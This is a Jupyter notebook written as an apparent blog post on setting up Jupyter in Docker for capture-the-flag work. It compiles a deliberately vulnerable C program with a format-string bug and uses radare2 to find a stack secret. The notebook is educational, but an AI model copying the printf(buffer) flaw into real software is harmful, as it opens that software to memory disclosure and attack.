{ "cells": [ { "cell_type": "markdown", "metadata": {}, "source": [ "# Attack Jupyter!\n", "\n", "I've been tripping with [Jupyter](https://jupyter.org/) a lot lately. I love that it's both a markdown editor and a live python code prompt, and I've been working on making the most out of it. So far, I've mostly used it to document my capture-the-flag challenges, but I think that in the long term it could serve as a collaborative reporting and pentesting tool. I've still got a long way to go until that happens, but in the meantime I thought I'd collect my thoughts in blog post form :)\n", "\n", "## Installing jupyter\n", "\n", "The beautiful thing about jupyter is that it runs on python. If you have python running, launching `python -m pip install jupyter` will be enough to get you going. Simple, right? Yeah, too simple for me. Boring. This why I decided that I wanted to get my jupyter notebook running in a docker `\\_(^.^)_/` . Seriously, though, running jupyter in a docker makes it portable across operating systems, and keeps it clean and independent from your host's installation. Also, it's a web application... that can access your file system and allow you to run code on it. A modicum of isolation is in order here.\n", "\n", "I have two files: a Dockerfile for setting up my docker image, and a Makefile for building, running and stopping and starting my container.\n", "\n", "Here's the Dockerfile:\n", "\n", "```\n", "FROM ubuntu \n", "RUN apt-get update \n", "RUN apt-get upgrade -y \n", "RUN apt-get install -y python3 python3-pip python python-pip radare2 build-essential \n", "RUN python3 -m pip install ipython jupyter \n", "RUN python -m pip install pwntools r2pipe pwntools-dbg-r2 ipython jupyter \n", "RUN useradd -ms /bin/bash jupyter \n", "USER jupyter \n", "WORKDIR /notebook \n", "```\n", "\n", "A couple of notes, here: first, you'll notice I'm installing python 2 and 3, along with the jupyter packages for both. The order of installation is important - first python3, then python2. I'm installing python 2 here because I want to use pwntools, but I also want python 3 up and running because it's 2019 and python 2 will eventually go the way of the dodo. Second, you could just install `python3`, `python3-pip` and run a nice, clean jupyter notebook that doesn't have all this additional stuff I've shoved into my docker. However, *I* want this extra stuff because I'm interested in using jupyter for pwnage! Last but not least: I create a *non-root* user for my docker called `jupyter`. If someone manages to gain access to my notebook, then they're a bit more limited with regards to the damage they could do.\n", "\n", "Here's the Makefile:\n", "\n", "```\n", "docker:\n", "\tdocker build -t jupyter .\n", "\n", "docker-run:\n", "\tdocker run --cap-add=SYS_PTRACE --security-opt seccomp=unconfined --name jupyter-notebook -p 127.0.0.1:8888:8888 -v /home/inf0junki3/notebook:/notebook -it jupyter jupyter notebook --ip 0.0.0.0\n", "\n", "docker-start:\n", "\tdocker start jupyter-notebook\n", "\n", "docker-stop:\n", "\tdocker stop jupyter-notebook\n", "\n", "```\n", "\n", "You'll notice that my `docker-run` task forwards my container's port 8888 to my loopback address at port 8888. It also maps a local directory, `/home/myuser/notebook`, to the `/notebook` directory on the container. Anything I write in my notebook gets saved on my host system - so I can delete my docker, update it, tweak it, recreate it, and what have you without losing my notebooks. In fact... As I write this (in jupyter) I keep stopping my container, tweaking it and rebuilding it. A bit tedious, like anything repetitive is bound to be - but otherwise easy and with no data loss. One quick last thing to point out here: you need the `--cap-add=SYS_PTRACE --security-opt seccomp=unconfined` portion to allow debugging in the container; in *principle* this should be OK... But I'll admit that I still have a lot to learn about docker security. My current thinking is that the container is running with a non-privileged user, and that the pid namespace is different than the host's namespace.\n", "\n", "## Your first jupyter pwn\n", "\n", "Jupyter can execute python out-of-the box. For example:" ] }, { "cell_type": "code", "execution_count": 1, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "Collecting requests\n", " Using cached https://files.pythonhosted.org/packages/51/bd/23c926cd341ea6b7dd0b2a00aba99ae0f828be89d72b2190f27c11d4b7fb/requests-2.22.0-py2.py3-none-any.whl\n", "Collecting urllib3!=1.25.0,!=1.25.1,<1.26,>=1.21.1 (from requests)\n", " Using cached https://files.pythonhosted.org/packages/e6/60/247f23a7121ae632d62811ba7f273d0e58972d75e58a94d329d51550a47d/urllib3-1.25.3-py2.py3-none-any.whl\n", "Collecting certifi>=2017.4.17 (from requests)\n", " Using cached https://files.pythonhosted.org/packages/69/1b/b853c7a9d4f6a6d00749e94eb6f3a041e342a885b87340b79c1ef73e3a78/certifi-2019.6.16-py2.py3-none-any.whl\n", "Collecting chardet<3.1.0,>=3.0.2 (from requests)\n", " Using cached https://files.pythonhosted.org/packages/bc/a9/01ffebfb562e4274b6487b4bb1ddec7ca55ec7510b22e4c51f14098443b8/chardet-3.0.4-py2.py3-none-any.whl\n", "Collecting idna<2.9,>=2.5 (from requests)\n", " Using cached https://files.pythonhosted.org/packages/14/2c/cd551d81dbe15200be1cf41cd03869a46fe7226e7450af7a6545bfc474c9/idna-2.8-py2.py3-none-any.whl\n", "Installing collected packages: urllib3, certifi, chardet, idna, requests\n", "Successfully installed certifi-2019.6.16 chardet-3.0.4 idna-2.8 requests-2.22.0 urllib3-1.25.3\n", "\n", "\n", "\n", " \n", " VNC passwords\n", " \n", "\n", " \n", "\n", "\n", "\n", "
\n", "

heapspray.io - a plethora of infosec garbage.

\n", " \n", "
\n", "
\n", "
\n", "
\n", "

\n", " VNC passwords

\n", "
\n", "\n", "
\n", "
\n", " Wed 12 March 2014\n", "\n", "

We like to think of VNC passwords as encrypted; but when you consider\n", "that they're encrypted using DES (a weak encryption algorithm) with a\n", "key that is hardcoded... Well... That pretty much makes VNC\n", "passwords encoded and not encrypted. There are a few VNC\n", "password revealers out there, such\n", "as vncpwd or VNCPassView,\n", "the former can be used in Linux and the latter in Windows. A\n", "prerequisite to using these is that you have access to the VNC passwd\n", "file and/or registry. Other tools exist to snarf the VNC password out of\n", "network captures.

\n", "\n", "
\n", "\n", "
\n", "
\n", "
\n", "
\n", "

blogroll

\n", " \n", "
\n", "
\n", "

social

\n", " \n", "
\n", "
\n", "\n", " \n", "\n", "\n", "\n" ] } ], "source": [ "import pip\n", "pip.main([\"install\", \"requests\"])\n", "\n", "import requests\n", "response = requests.get(\"https://heapspray.io/vnc-passwords.html\")\n", "print(response.text)" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "See what I did, there? I actually installed a python module, requests, via `pip` and then used it! Cool. In this manner, you could pretty much install any pre-requisites you need in your docker on-the-fly, and use it for your pwns. There is one caveat: for packages that require a terminal (such as pwntools), you do have to specify environment variables at least once in the notebook before you use them:" ] }, { "cell_type": "code", "execution_count": 2, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "env: TERMINFO=/usr/share/terminfo\n", "env: PWNLIB_NOTERM=true\n" ] }, { "name": "stderr", "output_type": "stream", "text": [ "[*] Checking for new versions of pwntools\n", " To disable this functionality, set the contents of /home/inf0junki3/.pwntools-cache/update to 'never'.\n" ] }, { "name": "stdout", "output_type": "stream", "text": [ "Checking for new versions of pwntools\n", "To disable this functionality, set the contents of /home/inf0junki3/.pwntools-cache/update to 'never'.\n" ] }, { "name": "stderr", "output_type": "stream", "text": [ "[*] You have the latest version of Pwntools (3.12.2)\n" ] }, { "name": "stdout", "output_type": "stream", "text": [ "You have the latest version of Pwntools (3.12.2)\n" ] } ], "source": [ "%env TERMINFO=/usr/share/terminfo\n", "%env PWNLIB_NOTERM=true\n", "\n", "from pwn import *\n", "import r2pipe" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "Now, you should be able to use pwntools to your heart's content.\n", "\n", "### Prepping pwnable code\n", "\n", "Let's take a look at an example, now. I lifted this code off of a site called [geeksforgeeks](https://www.geeksforgeeks.org/format-string-vulnerability-and-prevention-with-example/):" ] }, { "cell_type": "code", "execution_count": 3, "metadata": {}, "outputs": [], "source": [ "VULNERABLE_CODE = \"\"\"\n", "// A simple C program with format \n", "// string vulnerability \n", "#include \n", " \n", "int main(int argc, char** argv) \n", "{ \n", " char secret[7] = \"penguin\";\n", " char buffer[100]; \n", " strncpy(buffer, argv[1], 100); \n", " \n", " // We are passing command line \n", " // argument to printf \n", " printf(buffer); \n", " \n", " return 0; \n", "}\n", "\"\"\"" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "Didn't look at the solution, because I wanted to solve this from jupyter. Let's compile this:" ] }, { "cell_type": "code", "execution_count": 4, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "True\n" ] } ], "source": [ "with open(\"vulnerable.c\", \"w\") as vulnerable_file:\n", " vulnerable_file.write(VULNERABLE_CODE)\n", "import os\n", "os.system(\"gcc vulnerable.c -o vulnerable -no-pie\")\n", "print(os.path.exists(\"vulnerable\"))" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "### Running r2pipe\n", "\n", "Let's see how this loads up, now. I'm going to tell r2 to open `vulnerable` in debug mode:" ] }, { "cell_type": "code", "execution_count": 5, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "blksz 0x0\n", "block 0x100\n", "fd 5\n", "file /home/inf0junki3/notebook/research/blog_posts/vulnerable\n", "format elf64\n", "iorw true\n", "mode -rwx\n", "referer dbg:///home/inf0junki3/notebook/research/blog_posts/vulnerable aaaabbbbccccdddd\n", "type EXEC (Executable file)\n", "arch x86\n", "binsz 6492\n", "bintype elf\n", "bits 64\n", "canary true\n", "class ELF64\n", "crypto false\n", "endian little\n", "havecode true\n", "intrp /lib64/ld-linux-x86-64.so.2\n", "lang c\n", "linenum true\n", "lsyms true\n", "machine AMD x86-64 architecture\n", "maxopsz 16\n", "minopsz 1\n", "nx true\n", "os linux\n", "pcalign 0\n", "pic false\n", "relocs true\n", "relro partial\n", "rpath NONE\n", "static false\n", "stripped false\n", "subsys linux\n", "va true\n", "\n", "[Symbols]\n", "027 0x00000500 0x00400500 LOCAL FUNC 0 deregister_tm_clones\n", "028 0x00000530 0x00400530 LOCAL FUNC 0 register_tm_clones\n", "029 0x00000570 0x00400570 LOCAL FUNC 0 __do_global_dtors_aux\n", "030 0x00001040 0x00601040 LOCAL OBJECT 1 completed.7697\n", "031 0x00000e18 0x00600e18 LOCAL OBJECT 0 __do_global_dtors_aux_fini_array_entry\n", "032 0x000005a0 0x004005a0 LOCAL FUNC 0 frame_dummy\n", "033 0x00000e10 0x00600e10 LOCAL OBJECT 0 __frame_dummy_init_array_entry\n", "036 0x000007ec 0x004007ec LOCAL OBJECT 0 __FRAME_END__\n", "038 0x00000e18 0x00600e18 LOCAL NOTYPE 0 __init_array_end\n", "039 0x00000e20 0x00600e20 LOCAL OBJECT 0 _DYNAMIC\n", "040 0x00000e10 0x00600e10 LOCAL NOTYPE 0 __init_array_start\n", "041 0x000006b4 0x004006b4 LOCAL NOTYPE 0 __GNU_EH_FRAME_HDR\n", "042 0x00001000 0x00601000 LOCAL OBJECT 0 _GLOBAL_OFFSET_TABLE_\n", "043 0x000006a0 0x004006a0 GLOBAL FUNC 2 __libc_csu_fini\n", "045 0x00001030 0x00601030 WEAK NOTYPE 0 data_start\n", "046 0x00001040 0x00601040 GLOBAL NOTYPE 0 _edata\n", "047 0x000006a4 0x004006a4 GLOBAL FUNC 0 _fini\n", "051 0x00001030 0x00601030 GLOBAL NOTYPE 0 __data_start\n", "053 0x00001038 0x00601038 GLOBAL OBJECT 0 __dso_handle\n", "054 0x000006b0 0x004006b0 GLOBAL OBJECT 4 _IO_stdin_used\n", "055 0x00000630 0x00400630 GLOBAL FUNC 101 __libc_csu_init\n", "056 0x00601048 0x00601048 GLOBAL NOTYPE 0 _end\n", "057 0x000004f0 0x004004f0 GLOBAL FUNC 2 _dl_relocate_static_pie\n", "058 0x000004c0 0x004004c0 GLOBAL FUNC 43 _start\n", "059 0x00001040 0x00601040 GLOBAL NOTYPE 0 __bss_start\n", "060 0x000005a7 0x004005a7 GLOBAL FUNC 134 main\n", "061 0x00001040 0x00601040 GLOBAL OBJECT 0 __TMC_END__\n", "062 0x00000460 0x00400460 GLOBAL FUNC 0 _init\n", "001 0x00000490 0x00400490 GLOBAL FUNC 16 imp.strncpy\n", "002 0x000004a0 0x004004a0 GLOBAL FUNC 16 imp.__stack_chk_fail\n", "003 0x000004b0 0x004004b0 GLOBAL FUNC 16 imp.printf\n", "004 0x00000000 0x00400000 GLOBAL FUNC 16 imp.__libc_start_main\n", "005 0x00000000 0x00400000 WEAK NOTYPE 16 imp.__gmon_start__\n", "004 0x00000000 0x00400000 GLOBAL FUNC 16 imp.__libc_start_main\n", "005 0x00000000 0x00400000 WEAK NOTYPE 16 imp.__gmon_start__\n", "\n", "\u001b[36m \u001b[0m\u001b[36m \u001b[0m;-- \u001b[36mmain:\u001b[0m\n", "\u001b[36m/ \u001b[0m\u001b[31m(fcn) sym.main\u001b[0m 134\n", "\u001b[36m| \u001b[0m \u001b[31m sym.main\u001b[0m ();\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[37m; var int local_90h @ rbp-0x90\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[37m; var int local_84h @ rbp-0x84\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[37m; var int local_77h @ rbp-0x77\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[37m; var int local_73h @ rbp-0x73\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[37m; var int local_71h @ rbp-0x71\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[37m; var int local_70h @ rbp-0x70\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[37m; var int local_8h @ rbp-0x8\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m \u001b[31m; DATA XREF from 0x004004dd (entry0)\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x004005a7\u001b[0m \u001b[33m55\u001b[0m \u001b[35mpush\u001b[36m rbp\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x004005a8\u001b[0m \u001b[33m48\u001b[37m89\u001b[37me5\u001b[0m \u001b[37mmov\u001b[36m rbp\u001b[0m,\u001b[36m\u001b[36m rsp\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x004005ab\u001b[0m \u001b[33m48\u001b[37m81\u001b[37mec\u001b[37m90\u001b[32m00\u001b[32m00\u001b[37m.\u001b[0m \u001b[33msub\u001b[36m rsp\u001b[0m,\u001b[36m\u001b[36m \u001b[33m0x90\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x004005b2\u001b[0m \u001b[37m89\u001b[37mbd\u001b[33m7c\u001b[31mff\u001b[31mff\u001b[31mff\u001b[0m \u001b[37mmov dword\u001b[36m \u001b[0m[\u001b[36mlocal_84h\u001b[0m]\u001b[36m\u001b[0m,\u001b[36m\u001b[36m edi\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x004005b8\u001b[0m \u001b[33m48\u001b[37m89\u001b[37mb5\u001b[33m70\u001b[31mff\u001b[31mff\u001b[37m.\u001b[0m \u001b[37mmov qword\u001b[36m \u001b[0m[\u001b[36mlocal_90h\u001b[0m]\u001b[36m\u001b[0m,\u001b[36m\u001b[36m rsi\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x004005bf\u001b[0m \u001b[33m64\u001b[33m48\u001b[37m8b\u001b[37m04\u001b[33m25\u001b[33m28\u001b[37m.\u001b[0m \u001b[37mmov\u001b[36m rax\u001b[0m,\u001b[36m qword\u001b[36m fs:\u001b[0m[\u001b[36m\u001b[33m0x28\u001b[0m]\u001b[36m\u001b[0m\u001b[0m\u001b[31m ; [0x28:8]=-1\u001b[31m ; '('\u001b[31m ; 40\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x004005c8\u001b[0m \u001b[33m48\u001b[37m89\u001b[33m45\u001b[37mf8\u001b[0m \u001b[37mmov qword\u001b[36m \u001b[0m[\u001b[36mlocal_8h\u001b[0m]\u001b[36m\u001b[0m,\u001b[36m\u001b[36m rax\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x004005cc\u001b[0m \u001b[33m31\u001b[37mc0\u001b[0m \u001b[36mxor\u001b[36m eax\u001b[0m,\u001b[36m\u001b[36m eax\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x004005ce\u001b[0m \u001b[37mc7\u001b[33m45\u001b[37m89\u001b[33m70\u001b[33m65\u001b[33m6e\u001b[37m.\u001b[0m \u001b[37mmov dword\u001b[36m \u001b[0m[\u001b[36mlocal_77h\u001b[0m]\u001b[36m\u001b[0m,\u001b[36m\u001b[36m \u001b[33m0x676e6570\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x004005d5\u001b[0m \u001b[33m66\u001b[37mc7\u001b[33m45\u001b[37m8d\u001b[33m75\u001b[33m69\u001b[0m \u001b[37mmov word\u001b[36m \u001b[0m[\u001b[36mlocal_73h\u001b[0m]\u001b[36m\u001b[0m,\u001b[36m\u001b[36m \u001b[33m0x6975\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x004005db\u001b[0m \u001b[37mc6\u001b[33m45\u001b[37m8f\u001b[33m6e\u001b[0m \u001b[37mmov byte\u001b[36m \u001b[0m[\u001b[36mlocal_71h\u001b[0m]\u001b[36m\u001b[0m,\u001b[36m\u001b[36m \u001b[33m0x6e\u001b[0m\u001b[0m\u001b[31m ; 'n'\u001b[31m ; 110\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x004005df\u001b[0m \u001b[33m48\u001b[37m8b\u001b[37m85\u001b[33m70\u001b[31mff\u001b[31mff\u001b[37m.\u001b[0m \u001b[37mmov\u001b[36m rax\u001b[0m,\u001b[36m qword\u001b[36m \u001b[0m[\u001b[36mlocal_90h\u001b[0m]\u001b[36m\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x004005e6\u001b[0m \u001b[33m48\u001b[37m83\u001b[37mc0\u001b[37m08\u001b[0m \u001b[33madd\u001b[36m rax\u001b[0m,\u001b[36m\u001b[36m \u001b[33m8\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x004005ea\u001b[0m \u001b[33m48\u001b[37m8b\u001b[37m08\u001b[0m \u001b[37mmov\u001b[36m rcx\u001b[0m,\u001b[36m qword\u001b[36m \u001b[0m[\u001b[36mrax\u001b[0m]\u001b[36m\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x004005ed\u001b[0m \u001b[33m48\u001b[37m8d\u001b[33m45\u001b[37m90\u001b[0m \u001b[37mlea\u001b[36m rax\u001b[0m,\u001b[36m qword\u001b[36m \u001b[0m[\u001b[36mlocal_70h\u001b[0m]\u001b[36m\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x004005f1\u001b[0m \u001b[37mba\u001b[33m64\u001b[32m00\u001b[32m00\u001b[32m00\u001b[0m \u001b[37mmov\u001b[36m edx\u001b[0m,\u001b[36m\u001b[36m \u001b[33m0x64\u001b[0m\u001b[0m\u001b[31m ; 'd'\u001b[31m ; 100\u001b[0m \u001b[37m; size_t n\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x004005f6\u001b[0m \u001b[33m48\u001b[37m89\u001b[37mce\u001b[0m \u001b[37mmov\u001b[36m rsi\u001b[0m,\u001b[36m\u001b[36m rcx\u001b[0m\u001b[0m\u001b[0m \u001b[37m; const char * src\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x004005f9\u001b[0m \u001b[33m48\u001b[37m89\u001b[37mc7\u001b[0m \u001b[37mmov\u001b[36m rdi\u001b[0m,\u001b[36m\u001b[36m rax\u001b[0m\u001b[0m\u001b[0m \u001b[37m; char *dest\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x004005fc\u001b[0m \u001b[37me8\u001b[37m8f\u001b[37mfe\u001b[31mff\u001b[31mff\u001b[0m \u001b[1;32mcall sym.imp.strncpy\u001b[0m\u001b[0m\u001b[31m ; char *strncpy(char *dest, const char *src, size_t n)\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x00400601\u001b[0m \u001b[33m48\u001b[37m8d\u001b[33m45\u001b[37m90\u001b[0m \u001b[37mlea\u001b[36m rax\u001b[0m,\u001b[36m qword\u001b[36m \u001b[0m[\u001b[36mlocal_70h\u001b[0m]\u001b[36m\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x00400605\u001b[0m \u001b[33m48\u001b[37m89\u001b[37mc7\u001b[0m \u001b[37mmov\u001b[36m rdi\u001b[0m,\u001b[36m\u001b[36m rax\u001b[0m\u001b[0m\u001b[0m \u001b[37m; const char * format\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x00400608\u001b[0m \u001b[37mb8\u001b[32m00\u001b[32m00\u001b[32m00\u001b[32m00\u001b[0m \u001b[37mmov\u001b[36m eax\u001b[0m,\u001b[36m\u001b[36m \u001b[33m0\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x0040060d\u001b[0m \u001b[37me8\u001b[37m9e\u001b[37mfe\u001b[31mff\u001b[31mff\u001b[0m \u001b[1;32mcall sym.imp.printf\u001b[0m\u001b[0m\u001b[31m ; int printf(const char *format)\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x00400612\u001b[0m \u001b[37mb8\u001b[32m00\u001b[32m00\u001b[32m00\u001b[32m00\u001b[0m \u001b[37mmov\u001b[36m eax\u001b[0m,\u001b[36m\u001b[36m \u001b[33m0\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x00400617\u001b[0m \u001b[33m48\u001b[37m8b\u001b[33m55\u001b[37mf8\u001b[0m \u001b[37mmov\u001b[36m rdx\u001b[0m,\u001b[36m qword\u001b[36m \u001b[0m[\u001b[36mlocal_8h\u001b[0m]\u001b[36m\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x0040061b\u001b[0m \u001b[33m64\u001b[33m48\u001b[33m33\u001b[37m14\u001b[33m25\u001b[33m28\u001b[37m.\u001b[0m \u001b[36mxor\u001b[36m rdx\u001b[0m,\u001b[36m qword\u001b[36m fs:\u001b[0m[\u001b[36m\u001b[33m0x28\u001b[0m]\u001b[36m\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m ,=< \u001b[0m\u001b[32m0x00400624\u001b[0m \u001b[33m74\u001b[37m05\u001b[0m \u001b[32mje 0x40062b\u001b[0m\u001b[0m\n", "\u001b[36m| \u001b[0m\u001b[36m | \u001b[0m\u001b[32m0x00400626\u001b[0m \u001b[37me8\u001b[33m75\u001b[37mfe\u001b[31mff\u001b[31mff\u001b[0m \u001b[1;32mcall sym.imp.__stack_chk_fail\u001b[0m\u001b[0m\u001b[31m ; void __stack_chk_fail(void)\n", "\u001b[36m| \u001b[0m\u001b[36m `-> \u001b[0m\u001b[32m0x0040062b\u001b[0m \u001b[37mc9\u001b[0m \u001b[1;35mleave\u001b[0m\u001b[0m\u001b[0m\n", "\u001b[36m\\ \u001b[0m\u001b[36m \u001b[0m\u001b[32m0x0040062c\u001b[0m \u001b[37mc3\u001b[0m \u001b[31mret\u001b[0m\u001b[0m\u001b[0m\n", "\n" ] } ], "source": [ "r2 = r2pipe.open(\"vulnerable\", flags = [\"-d\", \"-e\", \"scr.color=true\"])\n", "r2.cmd(\"aaaa\")\n", "r2.cmd(\"doo aaaabbbbccccdddd\")\n", "print(r2.cmd(\"iy\"))\n", "print(r2.cmd(\"is\"))\n", "print(r2.cmd(\"pdf @ main\"))" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "One should note here that on my physical host I had r2dec running as well, which allowed me to decompile the code with `pdd @ main`. Sadly, this doesn't work in my docker setup. Why? Because the current version of the radare2 package in the apt repository appears to be behind the packages set up with r2pm - so r2dec fails to compile. One way of addressing this is to get the latest version of radare2 - there are even nifty instructions on how to do this here: http://radare.today/posts/getting-the-latest-radare2/. But I'm happy to look at the disassembly for now; the r2dec decompiler does not bring all that much when compared to Ida Pro's decompiler or ghidra's. Maybe one day I'll change my mind.\n", "\n", "As an argument, I specified \"aaaabbbbccccdddd\". I want to leak the secret here, which is \"penguin\". I want to break right after printf and then show the stack:" ] }, { "cell_type": "code", "execution_count": 6, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "u''" ] }, "execution_count": 6, "metadata": {}, "output_type": "execute_result" } ], "source": [ "r2.cmd(\"db 0x0040060d\")\n", "r2.cmd(\"dcu main\")\n", "r2.cmd(\"dc\")" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "To dump the same kind of information that I would see in Radare2's visual mode, I'd use something like this:" ] }, { "cell_type": "code", "execution_count": 7, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "- offset - 0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF\n", "\u001b[32m0x7ffcf638f620\u001b[0m \u001b[37m98\u001b[0m\u001b[37mf7\u001b[0m \u001b[33m38\u001b[0m\u001b[37mf6\u001b[0m \u001b[37mfc\u001b[0m\u001b[36m7f\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[37m10\u001b[0m\u001b[33m57\u001b[0m \u001b[33m43\u001b[0m\u001b[37mc1\u001b[0m \u001b[37m02\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[33m8\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[36m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[37m.\u001b[0m\u001b[33mW\u001b[0m\u001b[33mC\u001b[0m\u001b[37m.\u001b[0m\u001b[37m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\n", "\u001b[32m0x7ffcf638f630\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[33m70\u001b[0m \u001b[33m65\u001b[0m\u001b[33m6e\u001b[0m \u001b[33m67\u001b[0m\u001b[33m75\u001b[0m \u001b[33m69\u001b[0m\u001b[33m6e\u001b[0m \u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[33mp\u001b[0m\u001b[33me\u001b[0m\u001b[33mn\u001b[0m\u001b[33mg\u001b[0m\u001b[33mu\u001b[0m\u001b[33mi\u001b[0m\u001b[33mn\u001b[0m\n", "\u001b[32m0x7ffcf638f640\u001b[0m \u001b[33m61\u001b[0m\u001b[33m61\u001b[0m \u001b[33m61\u001b[0m\u001b[33m61\u001b[0m \u001b[33m62\u001b[0m\u001b[33m62\u001b[0m \u001b[33m62\u001b[0m\u001b[33m62\u001b[0m \u001b[33m63\u001b[0m\u001b[33m63\u001b[0m \u001b[33m63\u001b[0m\u001b[33m63\u001b[0m \u001b[33m64\u001b[0m\u001b[33m64\u001b[0m \u001b[33m64\u001b[0m\u001b[33m64\u001b[0m \u001b[33ma\u001b[0m\u001b[33ma\u001b[0m\u001b[33ma\u001b[0m\u001b[33ma\u001b[0m\u001b[33mb\u001b[0m\u001b[33mb\u001b[0m\u001b[33mb\u001b[0m\u001b[33mb\u001b[0m\u001b[33mc\u001b[0m\u001b[33mc\u001b[0m\u001b[33mc\u001b[0m\u001b[33mc\u001b[0m\u001b[33md\u001b[0m\u001b[33md\u001b[0m\u001b[33md\u001b[0m\u001b[33md\u001b[0m\n", "\u001b[32m0x7ffcf638f650\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m00\u001b[0m\u001b[32m00\u001b[0m \u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\u001b[32m.\u001b[0m\n", "\u001b[32m0x7ffcf638f660\u001b[0m 